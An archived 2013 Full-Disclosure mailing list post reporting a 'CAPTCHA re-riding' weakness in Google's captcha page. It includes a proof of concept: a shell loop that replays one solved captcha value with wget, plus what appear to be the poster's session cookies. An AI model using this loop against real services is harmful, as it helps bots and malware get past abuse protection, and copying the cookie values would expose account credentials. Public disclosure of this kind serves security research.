lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Mon, 26 Aug 2013 12:07:05 +0700
From: kevin philips <gamma95@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: CAPTCHA re-riding attack in https://google.com

folks,
I found CAPTCHA re-riding attack issue in
https://google.com<https://webmail.vng.com.vn/owa/redir.aspx?C=MBNlh708PUqi0Yw_S1rA3DV_zLusddAIGU0MzN53skrHcqWc0vyF9vEfJjFxlgVRJcDYBVS8nws.&URL=https%3a%2f%2fgoogle.com>
.
PoC:
Loop request with correct captcha (in this case the value of captcha is
coppro):

while true; do wget --header="Cookie:
PREF=ID=44ba1c9fba493ea4:U=e326f1400e3cc5b1:LD=vi:TM=1343010889:LM=1361717433:S=2dw8AygnrF9_TW_I;
NID=67=mwocoU0FoMG_dewxiEO3zDc7LLQtKVabiaezQsipcVb-020jysQ9qfngMTyIYNGsub8G7eQBqQPuTXUAO3GJVFZZWjF4tawOwj0KGaRTbw27z0ZEuZtSN-98hX1KedvpY_rzoHyd-InVhDtoG9dqONDS88RmP8JxgZAz7GhtH_QWpTk1WUIY4WTMb6AQ5f58oYUlgQ;
SID=DQAAAMEAAAAeueuQrtMIKY0NaJovAs1RyF3U1GgJWaoy5UBsCcZV3i2BF5jflSj7nG8YhPQoAe5kwE0eBjJzqeEafDuSTuTaTAGECW0rv2Fw1SQ8NHRzf9m4ymwerpALiHDeHUUlOlWmbrhXzjVm_RMkfvqohuwmHHAHPJKi-8MyKQbjiQd5lGEIH0JArQ8lUEuuqRRVUjBsTXis1TPqQWwHcHY5Chtm2ZOhZxoy2Xj59q8s_eC-Gj5YJ70jisfQrIWjhbjWeB3HvFVXinAWUVdvA6_5VbJ1;
HSID=ACvpz7M2xPdk68Q6x; APISID=C9DV1u24Umr1AfnD/AfEqGieNRVPzU6fur;
GDSESS=ID=cba44dffe2e20f09:TM=1374658124:C=c:IP=123.30.135.76-:S=APGng0snWLymjFQpx5DRXTM0yyoZnM5h5w"
"
http://www.google.com.vn/sorry/Captcha?continue=http%3A%2F%2Fwww.google.com.vn%2Fsearch%3Fq%3Dcaptcha%2Bre%2Briding%2Battack%26client%3Dubuntu%26channel%3Dcs%26oq%3Dcaptcha%2Bre%2Briding%2Battack%26aqs%3Dchrome.0.69i57j69i65.6126j0%26sourceid%3Dchrome%26ie%3DUTF-8&id=17901488348886592341&captcha=coppro&submit=G%E1%BB%ADi<https://webmail.vng.com.vn/owa/redir.aspx?C=MBNlh708PUqi0Yw_S1rA3DV_zLusddAIGU0MzN53skrHcqWc0vyF9vEfJjFxlgVRJcDYBVS8nws.&URL=http%3a%2f%2fwww.google.com.vn%2fsorry%2fCaptcha%3fcontinue%3dhttp%253A%252F%252Fwww.google.com.vn%252Fsearch%253Fq%253Dcaptcha%252Bre%252Briding%252Battack%2526client%253Dubuntu%2526channel%253Dcs%2526oq%253Dcaptcha%252Bre%252Briding%252Battack%2526aqs%253Dchrome.0.69i57j69i65.6126j0%2526sourceid%253Dchrome%2526ie%253DUTF-8%26id%3d17901488348886592341%26captcha%3dcoppro%26submit%3dG%25E1%25BB%25ADi>"
-qd; done


Abuse this bug, malware, automation scanner, zombie computers, SEO bot can
bypass the google captcha with the correct initiation captcha for malicious
actions.

References:
_https://blog.whitehatsec.com/top-ten-web-hacking-techniques-of-2012/
_http://gursevkalra.blogspot.com/2012/03/captcha-re-riding-attack.html

Updated: Sadly, Google Security Team considers "captcha re-riding attack"
in this case is not critical bug. Well, I decide to post  to Full
Disclosure for more discussions.
~g4mm4

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists